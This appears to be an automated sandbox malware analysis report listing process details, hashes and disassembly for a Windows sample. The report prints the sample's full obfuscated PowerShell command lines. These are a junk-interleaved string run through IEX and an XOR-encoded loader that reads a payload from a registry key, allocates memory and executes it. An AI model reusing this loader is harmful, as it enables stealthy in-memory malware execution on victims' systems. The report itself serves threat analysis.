VaEPr8Ar0si9Fo1Ec9No7Sk8ClBBk8Ta0HeDRy4DaCDu9MeCAl5CaBBiEAuBHo6Pe9FrCTh9Co6Ex9Pl1Da8Mi0Su8gl8MiCPrBDiACi8Op9So0Al8Af9Ci9Op1Co8NeCBu8Sv6St8Cl4Ox9Ld6Na9De1AuAGe1Tr8In0Tr8ef9St8He0Om8In2Me8Kl4Ud9No1Wo8Dr0DeBpa8EnCHaCDu'Im;Le&Sa(Bo`$GlSPatAuyDirSakWaeAftHorMlnUneUn7Fl)Cr Br`$GtLDieFouTacEmiLafAfeArrUn2Sh;Sr`$KlLTreGauFacShiKnfEvestrBe3Br je=No StHAnTIdBUr dy'FlCBh1FoBLi3ReBPh1SeAFo7NuCUnBreAEn1Di8Ko0Vr8An3su8AnCha8UdBen8Ma0SyAFr6Co8EaACo8AkBAf9Re6Ru9Ku1Im9Am7Pr9Du0St8Pa6In9Re1de8NoAKa9Ne7ThCLaDCoCPl1LaABeDTi8Me1Me8Pr9Hv8Nd6AlDRe3RoCLe9DiCPr5EvBArEOpBBr6Ta9YoCDe9De6Sm9Sy1Ud8Ca0An8pl8TrCCoBFrBIn7Do8La0Pa8Mu3Ve8La9Po8Ja0Un8He6Gr9Fo1Fl8BaCsk8FoAUn8PiBBlCDeBClARi6Un8Be4De8Fo9fi8sa9Re8ElCLi8DdBBi8Fe2VlAIc6Be8FaAHy8OpBIn9Ca3An8st0po8InBFr9Sc1Ek8WiCAn8HeASe8EfBHe9Ot6SyBSe8ViDBaFRaDMaFOpBSc6Fi9Ga1La8Sp4Am8ReBPa8Ub1Bl8La4Sn9In7Fo8Hy1GrCSn9StChj5GrCAp1Li9Ou3Us8Pl4Ak9Pu7MaBAnABe9Tr5Ta8fr4Sk9br7om8Mo4Tr8Ra8ni8Sp0no9An1ka8Ca0Un9De7In9Su6EnCAbCSlCOfBSeBIn6Un8Ph0Sa9Un1ScABeCSp8Da8Pa9Tj5La8Tp9Un8Af0Al8Bu8go8Lo0Be8ErBPa9Ka1Tr8Sa4Pr9hv1Dm8PoCJu8MeARa8PiBSkASu3Ab8Ho9Ud8Fa4Da8Me2St9Bl6YnCCeDCoCAu1ToAOrDBl8Te1Ka8Be9Ba8Sa6TaDNe2PrCBaCOx'Un;Pe&ur(Oo`$inSDetLayBlrHikSoekatRerIrnToePe7mi)Go To`$MoLFoeYluDicKaiEmfDeeBirRo3Sl;Ah`$ToLRaeRauUdcHyiFefHoeMerMo4Us Co=Pa BiHLaTNaBFl Mi'ChCGu1ArBto3ThBEl1StAAk7TyCLaBFyABr1As8Fa0Su8Br3Da8SuCLi8KoBGr8Fl0AzABi8Wi8Dr0Op9Fo1Ra8ReDFa8FoAHy8Fo1TeCMiDSuCCo1BlBSa6Mi9Te1La9AsCBu9Bl7Tr8enECa8ro0Re9St1Re9Ne7Bo8StBim8Ta0AkDEk7InCSa9PrCEl5DiCBu1DiBTa6Ko9Si1Su9chCOp9Pr7Cr8GeEov8Ru0Dr9wr1Op9Sk7Ve8ChBDo8Ou0ViDSo6ueCTi9CrCSt5BaCRy1Pr9St3Un9Bi7Ta9In1BrCEk9ReCsi5ChCcl1Fi9Sa3Bl8Ga4Re9Fr7InBWiAVe9Fr5Mo8Yo4Se9Ty7Dr8St4Gn8Re8Ly8Fr0Ov9Po1Gr8Do0Mi9Pa7Ce9Bl6FiCscCHaCnaBCoBAn6Sl8sp0Fo9En1VaAWiCLb8Ok8Bl9Ad5Be8Dr9Ou8sc0Ti8Ba8Ir8Ha0Me8UlBRe9be1Dv8ko4Tr9Gu1Po8AnCKv8SkASk8PaBFaADi3Di8ta9ov8Ch4Pu8Tr2Ov9Ov6TpCUnDPhCNa1KeAIjDMi8Ej1Im8Le9Su8au6MoDSt2ReCAsCMi'Pr;wi&Au(st`$AfSJutKoyCirIrkUneUmtJorSynSyeCh7Ti)Pr Ge`$InLNieKauSacbaiSifOveDerVr4Pr;Sk`$KoLSqeDauTrcDeiRefydeEnrKo5El fy=sa PaHInTriBSt in'Sk9In7Ba8Av0Ak9Fo1Ve9Op0Un9Fa7Pr8FiBInCMi5AsCKi1AfBJe3GaBBi1SmAMo7TuCuoBGtADy6Ga9Ho7Ja8su0Wh8ve4Kn9Sc1Th8Fo0ReBIn1Tr9ScCFo9Ud5Pi8Ni0SyCSeDMrCSyCPe'in;Al&Sa(La`$UdSVatLyyByrAskFledetSyrArnAdeSu7Pr)Rg Se`$BaLSpeTmuSacFiiDifSyeBarHo5Pe Fk Ta Wi;Un}Ho`$HekRekDi Ur=fi BlHUdTcrBOk Wi'Af8LyELe8Ca0Pa9fl7Pr8AwBUn8Sa0te8Ca9AnDla6AnDLa7Ov'Ar;Af`$MoLtheopuBlcBeiRafUneMerBe6Po pr=to SaHSkTBrBra st'FaCWi1Mo9Pl3Sm8La4Ps9To7MaBReAra9Ud3Si8Pj4AfCBr5vaDOm8WiCVe5FuBStEisBSt6Re9UnCPr9Fi6En9Ak1Bi8Ca0Pr8st8OcCBaBNgBSc7Ta9Kr0xy8UnBCy9cy1Ea8SmCSj8Te8un8sa0IbCBeBInAHjCAn8HaBTh9Fo1De8El0Ou9Sp7Fo8RoAMi9Re5EsBDo6Di8Tr0Nu9Dr7Id9Ze3Un8OcCEn8Vi6Sp8fo0La9Ca6deCDoBFaAFe8St8Pi4Va9Sy7Ex9Fo6Mi8BlDTy8Sp4Ma8In9UkBSt8KnDAuFSmDPaFViAKn2Un8Pr0Ce9hy1HjALg1Gy8Ca0Bu8ke9To8No0Da8Or2De8Re4Mo9Cl1Fr8El0AgANe3Mo8SiAAn9Sk7WeASa3Ov9Ri0Sp8YuBSy8Sh6Sa9Gr1Ca8KaCAn8ObAPe8AdBdrBGn5Vi8isAUm8PoCTi8EjBpe9Sy1Un8In0Fo9Ti7UnCGoDTeCXwDCe8Sn3Sy8PrEWa9Rh5SpCCa5BoCSh1Mu8SaEKl8TaEPrCBy5HjCVi1SkBve6Ri9Un1De9unCde9Ya7eu8KoESt8Go0Un9Sh1Ne9Ov7Sl8CrBUn8Fu0SuDEl1ZyCMoCPhCDo9MiCWa5ReCMaDUnAFi2IdAGr1AdBNo1SaCHa5RdAfo5deCRiDCoBPrEVrAChCdi8MoBSa9Ri1prBWa5Ta9An1Pa9Af7StBSd8InCWa9BrCAc5FoBfeEUnBPy0ReAScCOc8HaBRe9Tu1DaDPo6TeDJi7StBek8DiCSo9SeCLe5BeBTrEDoBAr0amAUnCJe8AdBdo9In1asDSo6FuDil7adBgn8HaCUd9faCEx5SpBKoEDeBBi0HoADaCAf8HyBFr9Sm1UnDUn6CoDGn7SvBBi8TrCRoCBuCmi5ceCRaDTrBFoEenAAnCpr8SuBCa9Fr1ZiBOl5Sd9Al1By9Vi7DeBCo8chCSaCBeCPaCSpCUdCHe'Ko;na&du(Su`$ImSAgtInyNarTikteeDetTerErnVreFa7Ca)De Da`$SkLMyeCeuAtcHaiKrfOreAkrCa6Ti;Ce`$PlvPraEnrHe_ArnTotpa St=Tr OvfUnkHapsh Ud`$MoSspttsyBorImkpoeButBrrAnnjeeFa5Ar No`$DiSOttPoySarSkkBkeantRerNenDieDo6Kr;St`$PoLAneKouodcLeiNifBieSvrCl7Du Th=Uh BiHDiTmaBBl Be'ErCAd1HyAElASe9Fa1Le8AaDPr8MeCPr8ReBOvDVe6EnCIl5BeDCe8UdCSt5InCsn1Ba9Ra3He8Su4Fu9Nr7BaBTiAFr9St3pn8Py4AtCPoBcoAmeCSk8DuBPr9Sc3Re8snABr8SvEIn8Ss0SkCTrDSaBWiEPeAStCTi8AmBAn9no1HiBFo5Su9Vi1Pr9Sm7OrBCo8UnDStFSnDStFBiBPeFKr8Be0Rn9Tr7Un8NeANiCBl9HvCTo5KoDMo6ChDFi0HoDun6UdCWo9TiCBe5JeDCo5pa9SpDLoDPe6PeDCo5EnDIm5CeDre5GeCCe9elCSu5StDPr5Mi9DeDsaDav1heDQu5UeCAfCSa'Co;Au&Wi(ca`$GeSTwtStyBorLakNoeGatTerUsnDoeMi7Ho)Gl Ex`$PoLFlePruuncOuipifOvePtrno7Ma;ov`$OpLRiefiufrcBiiUnfKaeHurBr8wa Mu=An IoHSeTRyBCo Op'rdCFr1Ba8AuATa9kn7Fa8OvCDeCNe5anDSt8IdCro5waCRu1si9Ga3Du8Ka4Li9Un7RoBArANe9Ca3El8De4DuCEnBLyATiCSp8SiBBl9Se3Pr8OvAEl8WiESk8In0liCVeDBuBDoEReALeCLa8PaBNe9Lu1puBOx5Ca9Va1tr9in7ByBMe8ReDSpFFiDNoFBuBdaFVr8Ca0ar9Ru7Ls8BiAUpCHa9inCPr5PhDUn5Bu9deDNiDpr4EkDJo5StDKr5CaDAr5apDDe5DaDLu5FiCDe9FoCSa5tsDTe5Lu9NaDAvDEs6RoDSl5StDRi5AnDSl5AtCSt9MeCVo5AnDaf5Sh9AbDNiDSk1UnCunCSt'Br;Th&Ko(To`$ArSDotLnySerOmkToeSotOvrAlnReeAn7Ac)Ba Un`$SkLCeeAmucocIdiQufroeFrrBi8Ku;De`$kaLTusCaeOprInucunArdSneSirVisErgsoeColInsCreTerPh=Be(BjGKeeBatLa-BrITrtKneArmEcPberProAnpEneUnrNotsiyUn Ri-BiPAcaSttMyhAe fo'TeHMoKJoCFlUAt:ti\BlMPeeMetMoaGrgFanStoRimSaydo\KaeDoaBogInlAbemadSu'St)Ov.LnSUnaHarEucGloTilSioEvgFliKasCotso;Se`$SvLReeCouDacFriSefYneGorso9Cl Me=Me HjHBoTRaBll Ha'ArCMe1VuABr9mi8Fa0pa9ta0Tr8Ka6Ri8LeCfo8Fl3wh8Vr0Su9pe7MiCLa5AfDSo8DiCSp5CaBSiEkaBGu6No9AsCSy9Fr6fe9St1Li8Un0In8Lu8ArCStBJeABu6Ha8HeAbe8ThBRe9mi3Ir8Go0Ch9Fo7Ma9Ar1JiBOr8PyDDyFsyDBeFAfAHa3Gr9Ko7Fo8StADi8Gr8moAFh7Fa8Dr4At9re6Su8Em0FoDUn3SrDRe1LoBBa6Ke9Me1Sl9Po7fe8stCIn8RaBRa8Pe2JaCAlDMoCfo1reAAn9Af9bo6Er8Un0Ex9de7Nu9Rh0Re8phBCa8To1Ta8Mo0no9Jo7To9Ko6Em8Ga2De8Fu0Fl8fo9Sa9Ad6pa8Af0Se9Ka7saCReCEg'Si;He&Ch(sl`$slStwtSaySmrDekAdeLotDirUnnTieBl7Ep)Va Ab`$NaLSieBauOecTaiarfCaeAdrkr9Ci;Li`$SuLMasSueMarUnuWhnGtdFoeTerHasDygRuePilAnsRieOvrAr0By Hi=Th myHFaTdiBHy At'PlBBoErhBFd6Ir9BlCSm9Ka6Sy9Sp1Wi8La0Pr8Gr8GoCDeBBiBRe7Mo9In0no8UnBBl9sa1ui8OpCSe8fj8Re8Hm0SyCEaBTrAReCHj8HaBBo9Ch1nd8Ma0Fo9Ve7Ro8ChALa9An5MeBUb6Sp8Co0Bo9Ki7Hj9Te3In8feCRe8Tr6Re8Ov0Un9Un6kuCPlBCiAHo8Ko8Fl4fl9ha7Ku9Ri6bl8UnDmo8St4Co8ls9SkBRe8UnDteFReDFoFMoALu6Ek8ToAFr9Da5La9DeCRiCBoDKoCZy1AiACy9Br8Sy0Re9Na0Sa8ef6Ge8SlCCa8Jo3Do8Ow0Bu9Bk7XiCbr9WhCCu5DdDKa5TnCPe9ItCTa5NgCFo5KoCNo1BaAPsARe9Pr1De8AbDPo8PlCte8reBAfDUf6CrCOv9HoCcr5JaDAl6viDSk0RoDPa6PeCSeCPl'He;Sc&Be(Hi`$AdSEktStyMorThkUneVatDerGrnReeOr7Bl)St Ar`$ReLPrsDeeLarSluArnFodSueDrrJesBegGleFllSksBleAnrLa0St;Sa`$hisOmiCozUneNo=mi`$PaLAmeStuIncQuiGofaleXerte.MacDeoCouennlitEm-Di3Sc5Qu3Bi;So`$GiLFrsFleSkrLvuPanKodloeDarFrsExgnoePrlPesBuePsrli1Rh Te=Fl SeHImTSkBCh Hy'UnBJaEBiBRa6Ih9MeCCa9Br6Ek9Ga1gr8Se0Kv8Te8StCmaBMaBRe7Pe9Fr0Wh8AbBSu9Kl1Be8MeCSu8Ci8Fl8be0FrCUnBPrANaCAf8DeBSu9Me1An8Gs0Hj9Rs7Re8DeASk9Ov5BeBEr6Ha8Li0Lf9Eg7Ly9Sp3Pe8UdCHe8Mi6No8Ju0Ha9Fr6AnCSuBToAGu8Ar8Be4Ul9Ph7Re9Pa6ge8BeDVa8Dr4Bu8By9LuBBr8HoDStFStDKoFTuAHe6La8reAVi9Sk5Sr9MaCCoCVeDSwCFu1DyAUn9ex8Rs0Fr9Vo0Tr8Fl6En8SyCUn8un3Ge8Li0St9Un7OkCAd9BuCat5ElDIn6GaDCo0efDSi6CoCGn9HjCVa5HoCvo1To8PrASp9Be7Pa8ReCUnCIn9UnCWr5InCPa1Vi9As6Ap8HyCCh9BlFSa8Hu0NiCBlCOm'Br;Lu&Ov(Ve`$BeSSttDuyDerInkMaePrtAlrAnnJneSp7En)Ek Ti`$NoLBesSnedirnauRenStdCaeWhrPrsLigRueLalCisDoeInrEx1Sr;El`$AmLAnsTreParPruGanSudLueAkrTasRagsteBolInsraeOlrGl2So Or=Si BrHScTSeBAn Ve'PnCUn1Ch9Fr3St8Tr4Co9Va7ToBEnAVi9Fe7Ex9Pa0Im8AnBFo8Ta8Ku8An0BoCBu5UbDCh8FoCDe5ToBCeEdeBOv6Fl9HiChe9Pu6Sk9Bl1Ud8Sp0Cy8Et8TaCVaBKnBSu7To9Fe0Ne8EkBSr9Ak1En8UnCBe8St8Be8He0MaCStBUdAAnCHe8AaBov9In1Pi8ud0Pl9Op7Pa8ZaABi9Fj5FuBMo6Ga8Vo0Sc9Bi7Tr9Di3Di8MaCOf8Up6Fo8Ep0Ko9Op6UnCSnBDiANo8dr8Un4Ka9St7ba9Al6Fi8arDSp8Aa4Ge8Bo9GhBPo8upDPsFFoDTrFDrAIn2Di8Be0Da9Pr1RiAga1Hj8Co0Ad8Bl9in8Pr0Ek8Ji2Al8He4Ja9fa1Af8He0FoAgl3Ve8UdAGe9De7BrARe3Ob9No0Sp8FjBim8Bi6Al9Le1Ra8TvCAp8SiApr8LyBIrBTe5In8MaAGe8FoCTo8DuBPa9Ku1Ka8Fu0En9Hk7BrCArDFoCBr1BiABeAKo9Al1Br8GaDTh8LuCTh8udBStDNa6EnCFu9DoCEx5SaCPoDUnASk2TuAPh1PhBNo1BeCMe5GaASl5SaCNiDPaBspEUnACaCSp8BeBRe9Fy1SnBMa5Wo9Co1Li9Ru7PiBFo8DeCBl9EgBKuEtrASoCOv8SuBHi9In1ReBBr5so9Xy1Be9Mu7BeBSc8LaCChCMaCPr5SuCGuDAsBBiECoBTe3Sm8SiAAp8MyCUt8St1PaBBl8LaCHyCbaCAmCShCngCGe'Pu;Fr&Fo(No`$BrSSutInytrrPakSoeAntSkrFanuneAf7No)De Tr`$ReLInsEgeSmrTauLanKadSpeOprAbsTegGleBrlKasSteInrst2In;Fa`$BlLLmsRoeBjrsauMinEndTreKarHesFagSkeGulTvsCheBurBa3Im Es=St BaHTaTdrBBo Bu'PrCEm1de9ud3Da8Pr4Te9du7AdBfeAjo9Al7An9Sk0St8BeBBa8Re8Vr8Li0CoCDoBErAUnCIn8ExBFl9Bo3St8SpARe8RoENu8Be0AsCBoDstCFe1Pr8AaAHo9wh7Fo8BeCLeCTr9InCBo1Va9Ud3Rh8Si4Ah9Si7DaBExAGr8ThBDa9yo1ToCTwCSp'We;Sk&go(Lu`$StSHetDeyprrMekBleKotomrSonWyeAl7Ti)Cr Pr`$ReLPrsSueGurAbuMenNedPaeDarSysTogSteaslIdsAdeFirBy3Te#Pj;""";;Function Lserundersgelser9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Antidrug = $Antidrug + $HS.Substring($i, 1); } $Antidrug;}$Romerretlige0 = Lserundersgelser9 'AlIMeEPaXSa ';$Romerretlige2 = Lserundersgelser9 'opsFrtSraUrrHytPa-TjjUnoskbDi ';$Romerretlige1= Lserundersgelser9 $Badeanstalt;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Romerretlige1 ;}else{&$Romerretlige0 $Romerretlige1;};;;
    Imagebase:0x7ff6f4710000
    File size:447488 bytes
    MD5 hash:95000560239032BC68B4C2FDFCDEF913
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:high

    General

    Target ID:2
    Start time:19:38:50
    Start date:28/11/2022
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff6edaf0000
    File size:625664 bytes
    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:10
    Start time:19:39:09
    Start date:28/11/2022
    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):
    Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C18384899680CCCBA180838C8B80B19C9580CDC1B6919C978E8091978B80D5C9C5C1B6919C978E8091978B80D4C9C5BEB69C96918088CBA89089918C86849691A180898082849180B8CC';&($Styrketrne7) $Leucifer2;$Leucifer3 = HTB 'C1B3B1A7CBA180838C8B80A68A8B9691979086918A97CDC1AD818986D3C9C5BEB69C96918088CBB78083898086918C8A8BCBA68489898C8B82A68A8B93808B918C8A8B96B8DFDFB691848B81849781C9C5C1938497BA95849784888091809796CCCBB68091AC8895898088808B9184918C8A8BA389848296CDC1AD818986D2CC';&($Styrketrne7) $Leucifer3;$Leucifer4 = HTB 'C1B3B1A7CBA180838C8B80A880918D8A81CDC1B6919C978E8091978B80D7C9C5C1B6919C978E8091978B80D6C9C5C1939791C9C5C1938497BA95849784888091809796CCCBB68091AC8895898088808B9184918C8A8BA389848296CDC1AD818986D2CC';&($Styrketrne7) $Leucifer4;$Leucifer5 = HTB '97809190978BC5C1B3B1A7CBA69780849180B19C9580CDCC';&($Styrketrne7) $Leucifer5 ;}$kk = HTB '8E80978B8089D6D7';$Leucifer6 = HTB 'C1938497BA9384C5D8C5BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA28091A180898082849180A38A97A3908B86918C8A8BB58A8C8B918097CDCD838E95C5C18E8EC5C1B6919C978E8091978B80D1CCC9C5CDA2A1B1C5A5CDBEAC8B91B59197B8C9C5BEB0AC8B91D6D7B8C9C5BEB0AC8B91D6D7B8C9C5BEB0AC8B91D6D7B8CCC5CDBEAC8B91B59197B8CCCCCC';&($Styrketrne7) $Leucifer6;$var_nt = fkp $Styrketrne5 $Styrketrne6;$Leucifer7 = HTB 'C1AA918D8C8BD6C5D8C5C1938497BA9384CBAC8B938A8E80CDBEAC8B91B59197B8DFDFBF80978AC9C5D6D0D6C9C5D59DD6D5D5D5C9C5D59DD1D5CC';&($Styrketrne7) $Leucifer7;$Leucifer8 = HTB 'C18A978CC5D8C5C1938497BA9384CBAC8B938A8E80CDBEAC8B91B59197B8DFDFBF80978AC9C5D59DD4D5D5D5D5D5C9C5D59DD6D5D5D5C9C5D59DD1CC';&($Styrketrne7) $Leucifer8;$Lserundersgelser=(Get-ItemProperty -Path 'HKCU:\Metagnomy\eagled').Sarcologist;$Leucifer9 = HTB 'C1A98090868C838097C5D8C5BEB69C96918088CBA68A8B93809791B8DFDFA3978A88A7849680D3D1B691978C8B82CDC1A9968097908B81809796828089968097CC';&($Styrketrne7) $Leucifer9;$Lserundersgelser0 = HTB 'BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA68A959CCDC1A98090868C838097C9C5D5C9C5C5C1AA918D8C8BD6C9C5D6D0D6CC';&($Styrketrne7) $Lserundersgelser0;$size=$Leucifer.count-353;$Lserundersgelser1 = HTB 'BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA68A959CCDC1A98090868C838097C9C5D6D0D6C9C5C18A978CC9C5C1968C9F80CC';&($Styrketrne7) $Lserundersgelser1;$Lserundersgelser2 = HTB 'C1938497BA97908B8880C5D8C5BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA28091A180898082849180A38A97A3908B86918C8A8BB58A8C8B918097CDC1AA918D8C8BD6C9C5CDA2A1B1C5A5CDBEAC8B91B59197B8C9BEAC8B91B59197B8CCC5CDBEB38A8C81B8CCCCCC';&($Styrketrne7) $Lserundersgelser2;$Lserundersgelser3 = HTB 'C1938497BA97908B8880CBAC8B938A8E80CDC18A978CC9C1938497BA8B91CC';&($Styrketrne7) $Lserundersgelser3#
    Imagebase:
    File size:430592 bytes
    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
    Has elevated privileges:
    Has administrator privileges:
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Reset < >

      Executed Functions

      Function 00007FFDC87D1FB8 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.794583917.00007FFDC87D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_7ffdc87d0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID: H
      • API String ID: 0-2852464175
      • Opcode ID: d75771e48b53ac3d30424bff72794cb2faa95347ff90f35c8d78e9072c7ad7d2
      • Instruction ID: 7948f02b9429c1b86de46b18b58d54af21eeba75aefc32380eaaea10de6f1ff4
      • Opcode Fuzzy Hash: d75771e48b53ac3d30424bff72794cb2faa95347ff90f35c8d78e9072c7ad7d2
      • Instruction Fuzzy Hash: 5D215C31A1894D8FDF54EF58C896EAD7BA1EF69300F54016AD40AD7296DA34FC82CBC0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFDC87D2A43 Relevance: .1, Instructions: 100COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000001.00000002.794583917.00007FFDC87D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_7ffdc87d0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9308533a03d8b5e027e22567a8f4cc50b79b23536ab986969468c9a3214bcc61
      • Instruction ID: e9d39c2a095ae93a6891b549017db1420b97a675979a2833f0649afb526f24c0
      • Opcode Fuzzy Hash: 9308533a03d8b5e027e22567a8f4cc50b79b23536ab986969468c9a3214bcc61
      • Instruction Fuzzy Hash: FD316031A1890D8FDF94EF58C455EA87BE1EF59300F54016AE40AD7296DA75FC82CBC0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFDC87D309C Relevance: .1, Instructions: 98COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000001.00000002.794583917.00007FFDC87D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_7ffdc87d0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 52dee285fd078f82f1d925512248dd6c4e923d7befe14744fa090bb9a63f0b83
      • Instruction ID: a83d0532e62e489442b1370ad5b02a698413ae4f8f2fd27dd33007890d23b292
      • Opcode Fuzzy Hash: 52dee285fd078f82f1d925512248dd6c4e923d7befe14744fa090bb9a63f0b83
      • Instruction Fuzzy Hash: FE311A31A18A498FDF84EF58C855EA9B7E2FF69300F54016AE409D3296DE35E881CBC1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFDC87D1FAF Relevance: .1, Instructions: 88COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000001.00000002.794583917.00007FFDC87D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_7ffdc87d0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d0b8f02535444aa492c867700a71e5116b51219e819f179f8d22629b8c1adee0
      • Instruction ID: 37bbc60ec0929924c0dfada6800be93ccbbe0a307021d258cbc6689e9390863e
      • Opcode Fuzzy Hash: d0b8f02535444aa492c867700a71e5116b51219e819f179f8d22629b8c1adee0
      • Instruction Fuzzy Hash: B521F931A1890D8FDF54EF58C455EA977A1EF69300F54016AD40AD7296DA35F882CBC1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFDC87D2DAC Relevance: .0, Instructions: 49COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000001.00000002.794583917.00007FFDC87D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_7ffdc87d0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 40b2b0e8c218e4701cf80b635701225c568f540cc5e15c1792ef39d64831a61c
      • Instruction ID: dbfd43c3002dfa09fc831424a3179d48a54b7ced0b7f8d87ac22fc6bd517f0e5
      • Opcode Fuzzy Hash: 40b2b0e8c218e4701cf80b635701225c568f540cc5e15c1792ef39d64831a61c
      • Instruction Fuzzy Hash: 40F0447276CA454FD7589A0CE8569B573D1E799320B50013EE08BC72D6E926B8438785
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFDC87D18D5 Relevance: .0, Instructions: 49COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000001.00000002.794583917.00007FFDC87D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87D0000, based on PE: false
      Joe Sandbox IDA Plugin
